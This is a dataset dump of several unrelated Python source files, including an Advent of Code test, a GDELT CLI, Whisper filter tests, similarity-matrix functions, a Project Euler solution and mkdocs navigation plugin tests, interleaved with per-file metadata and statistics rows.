assert expected == actual
def test_solve_part_2a():
import day03
raw_lines = """
R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51
U98,R91,D20,R16,D67,R40,U7,R15,U6,R7
""".split("\n")
trimmed_lines = map(lambda s: s.strip(), raw_lines)
lines = list(filter(None, trimmed_lines))
day03 = day03.Day03(lines)
actual = day03.solve_part_2()
expected = 410
assert expected == actual
| 28.764706
| 55
| 0.620995
| 218
| 1,467
| 4.013761
| 0.252294
| 0.082286
| 0.054857
| 0.073143
| 0.941714
| 0.941714
| 0.941714
| 0.818286
| 0.818286
| 0.818286
| 0
| 0.134222
| 0.233129
| 1,467
| 51
| 56
| 28.764706
| 0.643556
| 0
| 0
| 0.833333
| 0
| 0.041667
| 0.205722
| 0.107629
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbc27064c5b1571af1925f1b23fe88e0ccfe8c87
| 3,314
|
py
|
Python
|
manage.py
|
volod/gdelt20utils
|
4fdcc1803d4ef300d4d30857752faa1c9dcb63d0
|
[
"Apache-2.0"
] | null | null | null |
manage.py
|
volod/gdelt20utils
|
4fdcc1803d4ef300d4d30857752faa1c9dcb63d0
|
[
"Apache-2.0"
] | null | null | null |
manage.py
|
volod/gdelt20utils
|
4fdcc1803d4ef300d4d30857752faa1c9dcb63d0
|
[
"Apache-2.0"
] | null | null | null |
import click
from gdelt20utils.common import constants
from gdelt20utils.common.gd_config import config
from gdelt20utils.extract.run import run_extract
from gdelt20utils.load.run import run_load
@click.group(help="Extract")
@click.pass_context
def cli(ctx):
ctx.obj.update(config)
@cli.command("extract", help="Extract gdelt20 data")
@click.option("--base_path", "-b",
type=click.Path(),
required=True,
default=constants.DEFAULT_DATA_PATH,
help="gdelt20 data target path")
@click.option("--start_date", "-d",
type=click.DateTime(),
required=True,
help="gdelt20 data set start day")
@click.option("--finish_date", "-n",
type=click.DateTime(),
required=True,
help="gdelt20 data set finish date")
@click.option("--languages", "-l",
type=click.Choice(constants.GDELT_LANGUAGE, case_sensitive=True),
required=True,
default=constants.GDELT_LANGUAGE,
multiple=True,
help="gdelt20 data set language corpus")
@click.option("--object_types", "-o",
type=click.Choice(constants.GDELT_OBJ_TYPE, case_sensitive=True),
required=True,
default=constants.GDELT_OBJ_TYPE,
multiple=True,
help="gdelt20 data set object type to load")
@click.pass_obj
def extract(config_obj, base_path, start_date, finish_date, languages, object_types):
run_extract(
config_obj,
base_path,
start_date,
finish_date,
languages,
object_types
)
@cli.command("load", help="load gdelt20 data")
@click.option("--base_path", "-b",
type=click.Path(),
required=True,
default=constants.DEFAULT_DATA_PATH,
help="gdelt20 data source path")
@click.option("--target_service", "-s",
required=True,
default=constants.TARGET_SERVISES[0],
help="gdelt20 data source path")
@click.option("--start_date", "-d",
type=click.DateTime(),
required=True,
help="gdelt20 data set start day")
@click.option("--finish_date", "-n",
type=click.DateTime(),
required=True,
help="gdelt20 data set finish date")
@click.option("--languages", "-l",
type=click.Choice(constants.GDELT_LANGUAGE, case_sensitive=True),
required=True,
default=constants.GDELT_LANGUAGE,
multiple=True,
help="gdelt20 data set language corpus")
@click.option("--object_types", "-o",
type=click.Choice(constants.GDELT_OBJ_TYPE, case_sensitive=True),
required=True,
default=constants.GDELT_OBJ_TYPE,
multiple=True,
help="gdelt20 data set object type to load")
@click.pass_obj
def extract(config_obj, base_path, target_service, start_date, finish_date, languages, object_types):
# TODO: implement extraction into targets directly from api
run_load(
config_obj,
base_path,
target_service,
start_date,
finish_date,
languages,
object_types
)
if __name__ == "__main__":
cli(obj={})
| 33.816327
| 101
| 0.602595
| 370
| 3,314
| 5.213514
| 0.183784
| 0.074132
| 0.085537
| 0.078797
| 0.782271
| 0.782271
| 0.782271
| 0.760498
| 0.760498
| 0.760498
| 0
| 0.014712
| 0.282136
| 3,314
| 97
| 102
| 34.164948
| 0.796133
| 0.0172
| 0
| 0.738636
| 0
| 0
| 0.165591
| 0
| 0
| 0
| 0
| 0.010309
| 0
| 1
| 0.034091
| false
| 0.034091
| 0.056818
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
837d5c64bd96c47f04f0f162592dcb9e30cb89e4
| 1,424
|
py
|
Python
|
tests/core/shh-module/test_shh_filter.py
|
happyuc-project/webu.py
|
5a01124fc84d74df09a33d9dabe88b704cd5b6c6
|
[
"MIT"
] | null | null | null |
tests/core/shh-module/test_shh_filter.py
|
happyuc-project/webu.py
|
5a01124fc84d74df09a33d9dabe88b704cd5b6c6
|
[
"MIT"
] | null | null | null |
tests/core/shh-module/test_shh_filter.py
|
happyuc-project/webu.py
|
5a01124fc84d74df09a33d9dabe88b704cd5b6c6
|
[
"MIT"
] | null | null | null |
import time
def test_shh_sync_filter(webu, skip_if_testrpc):
skip_if_testrpc(webu)
topic = webu.toHex(text="test")
shh_filter = webu.shh.filter({"topics": [topic]})
payloads = []
payloads.append(str.encode("payload1"))
webu.shh.post({
"topics": [topic],
"payload": webu.toHex(text=payloads[-1]),
})
time.sleep(1)
payloads.append(str.encode("payload2"))
webu.shh.post({
"topics": [topic],
"payload": webu.toHex(text=payloads[-1]),
})
time.sleep(1)
received_messages = shh_filter.get_new_entries()
assert len(received_messages) > 1
for message in received_messages:
assert message["payload"] in payloads
def test_shh_async_filter(webu, skip_if_testrpc):
skip_if_testrpc(webu)
received_messages = []
topic = webu.toHex(text="test")
shh_filter = webu.shh.filter({"topics": [topic]})
shh_filter.watch(received_messages.append)
payloads = []
payloads.append(str.encode("payload1"))
webu.shh.post({
"topics": [topic],
"payload": webu.toHex(text=payloads[-1]),
})
time.sleep(1)
payloads.append(str.encode("payload2"))
webu.shh.post({
"topics": [topic],
"payload": webu.toHex(text=payloads[-1]),
})
time.sleep(1)
assert len(received_messages) > 1
for message in received_messages:
assert message["payload"] in payloads
| 25.890909
| 53
| 0.630618
| 175
| 1,424
| 4.977143
| 0.211429
| 0.128588
| 0.089552
| 0.105626
| 0.851894
| 0.851894
| 0.851894
| 0.851894
| 0.851894
| 0.760046
| 0
| 0.012534
| 0.21559
| 1,424
| 54
| 54
| 26.37037
| 0.767234
| 0
| 0
| 0.863636
| 0
| 0
| 0.082865
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.045455
| false
| 0
| 0.022727
| 0
| 0.068182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8396aec6cdc039aca71f59317d7f8329e0b7d8dc
| 492
|
py
|
Python
|
client/libsinan/sinexceptions.py
|
asceth/sinan
|
289e0d18b7cf97b9c98a978741c6b17d91d6c254
|
[
"MIT"
] | 1
|
2016-05-09T00:28:00.000Z
|
2016-05-09T00:28:00.000Z
|
client/libsinan/sinexceptions.py
|
asceth/sinan
|
289e0d18b7cf97b9c98a978741c6b17d91d6c254
|
[
"MIT"
] | null | null | null |
client/libsinan/sinexceptions.py
|
asceth/sinan
|
289e0d18b7cf97b9c98a978741c6b17d91d6c254
|
[
"MIT"
] | null | null | null |
class SinanError(Exception):
""" A very simple exception class to use as a base
exception class for the sinan client """
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class ParseError(SinanError):
""" A very simple exception class to use as a base
exception class for the sinan client """
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
| 22.363636
| 54
| 0.648374
| 66
| 492
| 4.590909
| 0.333333
| 0.178218
| 0.072607
| 0.132013
| 0.838284
| 0.838284
| 0.838284
| 0.838284
| 0.838284
| 0.838284
| 0
| 0
| 0.26626
| 492
| 21
| 55
| 23.428571
| 0.839335
| 0.341463
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.8
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 9
|
839b24ac96a4c82108ad8c844c46ee4fdacc28c2
| 88
|
py
|
Python
|
qiwi_handler/qiwi_handler/loader/__init__.py
|
bezumnui/qiwi_handler
|
9562b1a8c8fcc1910dbc722278cb6f5af313fa02
|
[
"MIT"
] | null | null | null |
qiwi_handler/qiwi_handler/loader/__init__.py
|
bezumnui/qiwi_handler
|
9562b1a8c8fcc1910dbc722278cb6f5af313fa02
|
[
"MIT"
] | null | null | null |
qiwi_handler/qiwi_handler/loader/__init__.py
|
bezumnui/qiwi_handler
|
9562b1a8c8fcc1910dbc722278cb6f5af313fa02
|
[
"MIT"
] | null | null | null |
from qiwi_handler.loader.do_request import *
from qiwi_handler.loader.converter import *
| 44
| 44
| 0.852273
| 13
| 88
| 5.538462
| 0.615385
| 0.222222
| 0.416667
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079545
| 88
| 2
| 45
| 44
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
83ae8a04e1be7a1bfda53476a34faa6b892efd35
| 276
|
py
|
Python
|
geomstats/backend/numpy_random.py
|
effigies/geomstats
|
0d6979a15cefcf98f7f92bade9d0e4abee3dde14
|
[
"MIT"
] | 1
|
2018-05-23T20:18:23.000Z
|
2018-05-23T20:18:23.000Z
|
geomstats/backend/numpy_random.py
|
leslie-chu/geomstats
|
fbed39b47b16eab4a48179106e8d0c1a5891243d
|
[
"MIT"
] | null | null | null |
geomstats/backend/numpy_random.py
|
leslie-chu/geomstats
|
fbed39b47b16eab4a48179106e8d0c1a5891243d
|
[
"MIT"
] | null | null | null |
"""Numpy based random backend."""
import numpy as np
def rand(*args, **kwargs):
return np.random.rand(*args, **kwargs)
def randint(*args, **kwargs):
return np.random.randint(*args, **kwargs)
def seed(*args, **kwargs):
return np.random.seed(*args, **kwargs)
| 17.25
| 45
| 0.648551
| 38
| 276
| 4.710526
| 0.368421
| 0.335196
| 0.268156
| 0.301676
| 0.402235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163043
| 276
| 15
| 46
| 18.4
| 0.774892
| 0.097826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| true
| 0
| 0.142857
| 0.428571
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
83b7da992b40ecf38f69b01a0036fdc01f402635
| 7,988
|
py
|
Python
|
surprise/mySimilarities.py
|
filippoboscoUniTn/SurpriseMod
|
776fdb05a8cffa8e065f53f64166ca862db7de77
|
[
"BSD-3-Clause"
] | null | null | null |
surprise/mySimilarities.py
|
filippoboscoUniTn/SurpriseMod
|
776fdb05a8cffa8e065f53f64166ca862db7de77
|
[
"BSD-3-Clause"
] | null | null | null |
surprise/mySimilarities.py
|
filippoboscoUniTn/SurpriseMod
|
776fdb05a8cffa8e065f53f64166ca862db7de77
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
from six.moves import range
from six import iteritems
import h5py
def batched_cosine(n_x, yr, xr, min_support, batch_size, file_path, group_name, dset_name, *args, **kwargs):
try:
f = h5py.File(file_path, 'r+')
except OSError:
raise ValueError('File {} inesistente'.format(file_path))
#Apertura file di scrittura della matrice
dset = f[group_name+'/'+dset_name]
#Iterate over users/items in batched fashion
for current_batch in range(0, n_x, batch_size):
inf = current_batch
sup = (current_batch + batch_size) if (current_batch + batch_size) < n_x else n_x
current_batch_size = sup - inf
prods = np.zeros((current_batch_size, n_x), np.double)
freq = np.zeros((current_batch_size, n_x), np.int)
sqi = np.zeros((current_batch_size, n_x), np.double)
sqj = np.zeros((current_batch_size, n_x), np.double)
sim = np.empty((current_batch_size, n_x), np.double)
sim.fill(np.nan)
for indice, (x, r_xs) in enumerate(list(xr.items())[inf:sup]):
for y, r_x in r_xs:
for ox, r_ox in yr[y]:
freq[indice, ox] += 1
prods[indice, ox] += r_x*r_ox
sqi[indice, ox] += r_x**2
sqj[indice, ox] += r_ox**2
for indice, x_i in enumerate(range(inf, sup)):
for x_j in range(0, n_x):
if freq[indice, x_j] < min_support:
sim[indice, x_j] = 0
else:
denum = np.sqrt(sqi[indice, x_j] * sqj[indice, x_j])
num = prods[indice, x_j]
if(denum != 0):
sim[indice, x_j] = num/denum
else:
sim[indice, x_j] = 0
sim[indice, x_i] = 1
dset[inf:sup] = sim
f.close()
return dset_name
def batched_msd(n_x, yr, xr, min_support, batch_size, file_path, group_name, dset_name, *args, **kwargs):
try:
f = h5py.File(file_path, 'r+')
except OSError:
raise ValueError('File {} esistente'.format(file_path))
#Apertura file di scrittura della matrice
dset = f[group_name+'/'+dset_name]
#Iterate over users/items in batched fashion
for current_batch in range(0, n_x, batch_size):
inf = current_batch
sup = (current_batch + batch_size) if (current_batch + batch_size) < n_x else n_x
current_batch_size = sup - inf
sq_diff = np.zeros((current_batch_size, n_x), np.double)
freq = np.zeros((current_batch_size, n_x), np.int)
sim = np.empty((current_batch_size, n_x), np.double)
sim.fill(np.nan)
for indice, (x, r_xs) in enumerate(list(xr.items())[inf:sup]):
for y, r_x in r_xs:
for ox, r_ox in yr[y]:
freq[indice, ox] += 1
sq_diff[indice, ox] += (r_x - r_ox)**2
for indice, x_i in enumerate(range(inf, sup)):
for x_j in range(0, n_x):
if freq[indice, x_j] < min_support:
sim[indice, x_j] = 0
else:
sim[indice, x_j] = 1 / (sq_diff[indice, x_j] / freq[indice, x_j] + 1)
sim[indice, x_i] = 1
dset[inf:sup] = sim
f.close()
return dset_name
def batched_pearson(n_x, yr, xr, min_support, batch_size, file_path, group_name, dset_name, *args, **kwargs):
try:
f = h5py.File(file_path, 'r+')
except OSError:
raise ValueError('File {} inesistente'.format(file_path))
#Apertura file di scrittura della matrice
dset = f[group_name+'/'+dset_name]
#Iterate over users/items in batched fashion
for current_batch in range(0, n_x, batch_size):
inf = current_batch
sup = (current_batch + batch_size) if (current_batch + batch_size) < n_x else n_x
current_batch_size = sup - inf
prods = np.zeros((current_batch_size, n_x), np.double)
freq = np.zeros((current_batch_size, n_x), np.int)
sqi = np.zeros((current_batch_size, n_x), np.double)
sqj = np.zeros((current_batch_size, n_x), np.double)
si = np.zeros((current_batch_size, n_x), np.double)
sj = np.zeros((current_batch_size, n_x), np.double)
sim = np.empty((current_batch_size, n_x), np.double)
sim.fill(np.nan)
for indice, (x, r_xs) in enumerate(list(xr.items())[inf:sup]):
for y, r_x in r_xs:
for ox, r_ox in yr[y]:
freq[indice, ox] += 1
prods[indice, ox] += r_x*r_ox
sqi[indice, ox] += r_x**2
sqj[indice, ox] += r_ox**2
si[indice, ox] += r_x
sj[indice, ox] += r_ox
for indice, x_i in enumerate(range(inf, sup)):
for x_j in range(x_i + 1, n_x):
if freq[indice, x_j] < min_support:
sim[indice, x_j] = 0
else:
n = freq[indice, x_j]
num = n * prods[indice, x_j] - si[indice, x_j] * sj[indice, x_j]
denum = np.sqrt((n * sqi[indice, x_j] - si[indice, x_j]**2) *
(n * sqj[indice, x_j] - sj[indice, x_j]**2))
if denum == 0:
sim[indice, x_j] = 0
else:
sim[indice, x_j] = num / denum
sim[indice, x_i] = 1
dset[inf:sup] = sim
f.close()
return dset_name
def batched_pearson_baseline(n_x, yr, xr, min_support, batch_size, file_path, group_name, dset_name, global_mean, x_biases, y_biases, shrinkage=100, *args, **kwargs):
try:
f = h5py.File(file_path, 'r+')
except OSError:
raise ValueError('File {} già esistente'.format(file_path))
#Apertura file di scrittura della matrice
dset = f[group_name+'/'+dset_name]
#Iterate over users/items in batched fashion
for current_batch in range(0, n_x, batch_size):
inf = current_batch
sup = (current_batch + batch_size) if (current_batch + batch_size) < n_x else n_x
current_batch_size = sup - inf
prods = np.zeros((current_batch_size, n_x), np.double)
freq = np.zeros((current_batch_size, n_x), np.int)
sq_diff_i = np.zeros((current_batch_size, n_x), np.double)
sq_diff_j = np.zeros((current_batch_size, n_x), np.double)
sim = np.empty((current_batch_size, n_x), np.double)
sim.fill(np.nan)
for indice, (x, r_xs) in enumerate(list(xr.items())[inf:sup]):
for y, r_x in r_xs:
partial_bias = global_mean + y_biases[y]
for ox, r_ox in yr[y]:
freq[indice, ox] += 1
diff_i = (r_x - (partial_bias + x_biases[x]))
diff_j = (r_ox - (partial_bias + x_biases[ox]))
prods[indice, ox] += diff_i * diff_j
sq_diff_i[indice, ox] += diff_i**2
sq_diff_j[indice, ox] += diff_j**2
for indice, x_i in enumerate(range(inf, sup)):
for x_j in range(x_i + 1, n_x):
if freq[indice, x_j] < min_support:
sim[indice, x_j] = 0
else:
sim[indice, x_j] = prods[indice, x_j] / (np.sqrt(sq_diff_i[indice, x_j] *
sq_diff_j[indice, x_j]))
# the shrinkage part
sim[indice, x_j] *= (freq[indice, x_j] - 1) / (freq[indice, x_j] - 1 +
shrinkage)
if sim[indice, x_j] == -0:
sim[indice, x_j] = 0
sim[indice, x_i] = 1
dset[inf:sup] = sim
f.close()
return dset_name
| 42.26455
| 166
| 0.537682
| 1,163
| 7,988
| 3.450559
| 0.091144
| 0.081984
| 0.069773
| 0.065786
| 0.854971
| 0.850735
| 0.844256
| 0.82158
| 0.808124
| 0.791677
| 0
| 0.008975
| 0.344392
| 7,988
| 188
| 167
| 42.489362
| 0.757304
| 0.043941
| 0
| 0.746835
| 0
| 0
| 0.011536
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025316
| false
| 0
| 0.031646
| 0
| 0.082278
| 0.006329
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83bb1ca143e17c7fef9e84d87f94f2d1e81cf101
| 1,282
|
py
|
Python
|
python/problem8.py
|
shubhamoy/project-euler-solutions
|
9af99c4371ff565d5d8b13fe2fbaaafa5a29da51
|
[
"MIT"
] | 1
|
2016-05-14T15:58:03.000Z
|
2016-05-14T15:58:03.000Z
|
python/problem8.py
|
shubhamoy/project-euler-solutions
|
9af99c4371ff565d5d8b13fe2fbaaafa5a29da51
|
[
"MIT"
] | null | null | null |
python/problem8.py
|
shubhamoy/project-euler-solutions
|
9af99c4371ff565d5d8b13fe2fbaaafa5a29da51
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
def pod(val):
prod = 1
for i in range(len(val)):
prod = prod * int(val[i])
return prod
x = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
n = 13
y = [x[i:i+n] for i in range(0, len(x), 1)]
big = 1
for i in range(len(y)):
product = pod(y[i])
if product > big:
big = product
print "Biggest: ", big
| 67.473684
| 1,006
| 0.906396
| 58
| 1,282
| 20.034483
| 0.448276
| 0.010327
| 0.015491
| 0.028399
| 0.025818
| 0.025818
| 0
| 0
| 0
| 0
| 0
| 0.826623
| 0.050702
| 1,282
| 18
| 1,007
| 71.222222
| 0.128184
| 0.012481
| 0
| 0
| 0
| 0
| 0.797628
| 0.790514
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.071429
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
83ec9b7c9a3477b48326ee72edb0ec0c03ee4889
| 11,336
|
py
|
Python
|
mkdocs_awesome_pages_plugin/tests/navigation/test_nav.py
|
Owen-Liuyuxuan/mkdocs-awesome-pages-plugin
|
961363989877cbe4e4f9d0acda9ff22e352be9e1
|
[
"MIT"
] | 226
|
2018-02-07T09:58:36.000Z
|
2022-03-31T16:33:54.000Z
|
mkdocs_awesome_pages_plugin/tests/navigation/test_nav.py
|
Owen-Liuyuxuan/mkdocs-awesome-pages-plugin
|
961363989877cbe4e4f9d0acda9ff22e352be9e1
|
[
"MIT"
] | 55
|
2018-02-07T10:36:38.000Z
|
2022-03-16T03:23:47.000Z
|
mkdocs_awesome_pages_plugin/tests/navigation/test_nav.py
|
Owen-Liuyuxuan/mkdocs-awesome-pages-plugin
|
961363989877cbe4e4f9d0acda9ff22e352be9e1
|
[
"MIT"
] | 30
|
2018-05-01T17:27:03.000Z
|
2022-03-04T07:33:28.000Z
|
from .base import NavigationTestCase
from ...meta import Meta, MetaNavItem, MetaNavRestItem
from ...navigation import NavEntryNotFound
class TestNav(NavigationTestCase):
def test_all_listed(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.page('3'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavItem('3.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.page('3'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_some_listed(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.page('3'),
Meta(nav=[
MetaNavItem('3.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('3'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_none_listed(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.page('3'),
Meta(nav=[])
])
self.assertNavigationEqual(navigation.items, [])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.page('3'),
self.page('4'),
Meta(nav=[
MetaNavItem('3.md'),
MetaNavRestItem('...'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('3'),
self.page('2'),
self.page('4'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest_empty(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavRestItem('...'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest_glob(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2a'),
self.page('2b'),
self.page('3'),
Meta(nav=[
MetaNavItem('1.md'),
MetaNavRestItem('... | 2*.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('1'),
self.page('2a'),
self.page('2b'),
self.page('1')
])
def test_rest_glob_section(self):
navigation = self.createAwesomeNavigation([
self.page('a'),
self.page('b'),
self.section('Section A', [
self.page('1a', 'a/1a.md'),
self.page('1b', 'a/1b.md'),
self.page('2a', 'a/2a.md'),
self.page('2b', 'a/2b.md'),
Meta(nav=[
MetaNavRestItem('... | *b.md'),
MetaNavRestItem('...')
], path='a/.pages')
], 'a'),
Meta(nav=[
MetaNavRestItem('... | a*'),
MetaNavItem('b.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('a'),
self.section('Section A', [
self.page('1b', 'a/1b.md'),
self.page('2b', 'a/2b.md'),
self.page('1a', 'a/1a.md'),
self.page('2a', 'a/2a.md')
], 'a'),
self.page('b')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest_glob_precedence(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('1a'),
self.page('1b'),
self.page('2'),
self.page('2a'),
self.page('2b'),
Meta(nav=[
MetaNavRestItem('...'),
MetaNavItem('/', 'Link 1'),
MetaNavRestItem('... | 1*.md'),
MetaNavItem('/', 'Link 2'),
MetaNavRestItem('... | *[ab].md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.link('Link 1', '/'),
self.page('1'),
self.page('1a'),
self.page('1b'),
self.link('Link 2', '/'),
self.page('2a'),
self.page('2b')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest_regex(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2a'),
self.page('2b'),
self.page('3'),
Meta(nav=[
MetaNavItem('1.md'),
MetaNavRestItem(r'... | regex=2\w*\.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('1'),
self.page('2a'),
self.page('2b'),
self.page('1')
])
def test_rest_regex_section(self):
navigation = self.createAwesomeNavigation([
self.page('a'),
self.page('b'),
self.section('Section A', [
self.page('1a', 'a/1a.md'),
self.page('1b', 'a/1b.md'),
self.page('2a', 'a/2a.md'),
self.page('2b', 'a/2b.md'),
Meta(nav=[
MetaNavRestItem(r'... | regex=\w*b\.md'),
MetaNavRestItem('...')
], path='a/.pages')
], 'a'),
Meta(nav=[
MetaNavRestItem(r'... | regex=a\w*'),
MetaNavItem('b.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('a'),
self.section('Section A', [
self.page('1b', 'a/1b.md'),
self.page('2b', 'a/2b.md'),
self.page('1a', 'a/1a.md'),
self.page('2a', 'a/2a.md')
], 'a'),
self.page('b')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_rest_regex_precedence(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('1a'),
self.page('1b'),
self.page('2'),
self.page('2a'),
self.page('2b'),
Meta(nav=[
MetaNavRestItem('...'),
MetaNavItem('/', 'Link 1'),
MetaNavRestItem(r'... | regex=1\w*\.md'),
MetaNavItem('/', 'Link 2'),
MetaNavRestItem(r'... | regex=\w*[ab]\.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.link('Link 1', '/'),
self.page('1'),
self.page('1a'),
self.page('1b'),
self.link('Link 2', '/'),
self.page('2a'),
self.page('2b')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_title(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('2.md', 'Title'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('Title', '2.md'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_existing_link(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.link('Link'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_existing_link_rest(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
self.link('Link'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavRestItem('...'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.link('Link'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_added_link(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavItem('Url', 'Link'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.link('Link', 'Url'),
self.page('1')
])
self.assertValidNavigation(navigation.to_mkdocs())
def test_duplicate_list_item(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavItem('1.md'),
MetaNavItem('2.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2'),
self.page('1'),
self.page('2')
])
